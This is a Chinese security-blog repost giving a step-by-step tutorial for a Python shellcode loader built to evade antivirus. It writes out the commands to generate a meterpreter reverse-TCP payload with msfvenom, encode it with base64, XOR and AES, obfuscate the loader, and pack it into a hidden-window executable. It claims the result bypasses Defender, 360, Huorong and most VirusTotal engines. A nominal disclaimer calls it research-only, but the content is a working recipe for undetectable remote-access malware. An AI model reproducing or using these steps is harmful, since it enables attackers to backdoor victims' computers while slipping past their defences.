python免杀shellcode加载器(加密混淆)

admin 2022年6月14日09:50:20评论267 views字数 1161阅读3分52秒阅读模式
免责声明:仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。

项目地址:
https://github.com/HZzz2/python-shellcode-loader


0x01 前言

免杀方式:msfvenom生成raw格式的shellcode-->base64-->XOR-->AES,将python代码缩小并混淆最后生成exe。


目前过DF、360和火绒,virustotal:7/66过卡巴斯基、迈克菲等。


0x02 获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.gitcd python-shellcode-loaderpip install -r .requirements.txt

0x03 使用方式

1. 生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw


2. base64编码shellcode并替换jiami.py中的值

base64 -w 0 -i rev.raw > rev.bs64cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'


3. 加密base64并替换main.py中的值

python3 jiami.py

会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)

复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'


4. 缩小和混淆py代码

缩小python代码

pyminify main.py --output main-mini.py
混淆main-mini.py中的python代码 
https://pyob.oxyry.com/
python免杀shellcode加载器(加密混淆)

将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py


5. 打包成可执行文件exe

pyinstaller.exe -Fw -i .setting.ico --key=leslie .main-mini-ob.py

-F打包为单文件,-w不显示窗口,-i ico图标文件,--key 加密字节码的密钥,等待打包完成。。。。打包好后的可执行程序在dist目录中。


0x04 流程图

python免杀shellcode加载器(加密混淆)

0x05 检测图

DF

python免杀shellcode加载器(加密混淆)

火绒
python免杀shellcode加载器(加密混淆)

360杀毒

python免杀shellcode加载器(加密混淆)

360安全卫士云查杀

python免杀shellcode加载器(加密混淆)

virustotal

python免杀shellcode加载器(加密混淆)



关注公众号回复“1208”可以领取个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。

原文始发于微信公众号(Hack分享吧):python免杀shellcode加载器(加密混淆)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月14日09:50:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   python免杀shellcode加载器(加密混淆)http://cn-sec.com/archives/1114517.html

发表评论

匿名网友 填写信息